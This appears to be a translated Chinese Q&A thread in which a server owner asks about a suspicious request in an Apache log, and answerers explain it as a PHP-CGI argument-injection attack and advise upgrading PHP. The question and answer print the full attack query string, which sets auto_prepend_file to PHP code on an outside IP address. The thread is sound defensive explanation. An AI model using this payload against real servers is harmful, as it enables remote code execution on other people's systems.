1. 首頁
  2. 問答
  3. PHP - 這看起來像一個黑客攻擊嘗試

PHP - 這看起來像一個黑客攻擊嘗試

2013-10-15 43 views
0 
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

很多這些是在我的apache日誌中創建一個404,它看起來可能像一個PHP黑客企圖?PHP - 這看起來像一個黑客攻擊嘗試

來源

2013-10-15 user1209203

+2

我認爲這個問題屬於服務器故障。 – FalconC

+0

你解析這些參數嗎? –

+0

這可能是在CGI模式下攻擊PHP的一個不好的嘗試,它不是一個經常遇到的配置。 –

回答

4

對我來說,它看起來像一個黑客嘗試。

PHP Release Announcement page

一些系統支持用於供給串的陣列到CGI腳本的方法。這僅用於「索引」查詢的情況。這通過具有不包含任何未編碼=字符的URL搜索字符串的「GET」或「HEAD」HTTP請求來標識。

的URL解碼查詢字符串看起來是這樣的:

/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt

這些都是-d交換機,用於定義php.ini指令。基本上,這是它的變化:

safe_mode=off 
disable_functions=null 
allow_url_fopen=on 
allow_url_include=on

最後,有auto_prepend_file=http://61.19.253.26/echo.txt - 這個指令包括位於http://61.19.253.26/echo.txt PHP代碼和裏面的index.php代碼之前執行它。

echo.txt託管在泰國某處的網絡服務器上,包含<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>。這可能用於檢查您的服務器是否容易受到攻擊。

如果你使用Apache mod_cgi/mod_cgid之前現在 5.4.3 更新5.3.13和5.4.x版本之前運行PHP版本:http://www.php.net/downloads.php

來源

2013-10-15 21:35:59

+0

如何檢查mod_cgi是否正在運行? – user1209203

相關問題

 相關問題